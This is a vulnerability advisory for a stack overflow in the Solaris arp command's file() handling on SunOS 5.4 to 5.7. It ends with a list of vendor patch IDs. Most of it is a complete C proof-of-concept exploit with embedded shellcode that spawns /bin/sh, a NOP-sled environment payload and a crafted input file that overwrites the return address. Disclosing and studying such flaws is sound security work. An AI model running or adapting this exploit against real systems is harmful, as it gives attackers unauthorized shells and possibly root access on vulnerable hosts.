COMMAND

    arp

SYSTEMS AFFECTED

    SunOS 5.4..5.7 (sparc & x86)

PROBLEM

    Sor Pablo  Sebastian found  following.   The stack  overflow is in
    arp's file() function, which reads  the data in from the  supplied
    file.  The overflow  itself is a result  of using sscanf to  split
    up the file data.  In a typical buffer overflow fashion,  file()'s
    return address is overwritten with part of the supplied string.

    The code:

    #include <fcntl.h>
    
    /* arpexp.c
    
       arp overflow proof of concept by ahmed@securityfocus.com
       tested on x86 solaris 7,8beta
    
       default should work.  if not, arg1 = offset. +- by 100's
    
       Copyright Security-Focus.com, 11/2000
    */
    
    long get_esp() { __asm__("movl %esp,%eax"); }
    
    int main(int ac, char **av)
    {
    
      char shell[] = "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
                     "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
                     "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
                     "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
                     "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
                     "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
                     "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
                     "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
                     "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
                     "\x73\x68\xff\xff\xff\xff\xff\xff\xff"
                     "\xff\xff";
    
      unsigned long magic = 0x8047b78;
      unsigned long r = get_esp() + 600;
      unsigned char buf[300];
      int f;
    
      if (ac == 2)
        r += atoi(av[1]);
    
      memset(buf,0x61,sizeof(buf));
      memcpy(buf+52,&magic,4);
      memcpy(buf+76,&r,4);
    
      f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600);
      write(f,"1 2 3 4 ",8);
      write(f,buf,sizeof(buf));
      close(f);
    
      memset(buf,0x90,sizeof(buf));
      memcpy(buf,"LOL=",4);
      memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
      putenv(buf);
    
      system("/usr/sbin/arp -f /tmp/ypx");
      unlink("/tmp/ypx");
    
    }

SOLUTION

    The  following  patches  are  available  in  relation to the above
    problem:

        OS Version          Patch ID
        ============================
        SunOS 5.7           109709-01
        SunOS 5.7_x86       109710-01
        SunOS 5.6           109719-01
        SunOS 5.6_x86       109720-01
        SunOS 5.5.1         109721-01
        SunOS 5.5.1_x86     109722-01
        SunOS 5.5           109707-01
        SunOS 5.5_x86       109708-01
        SunOS 5.4           109723-01
        SunOS 5.4_x86       109724-01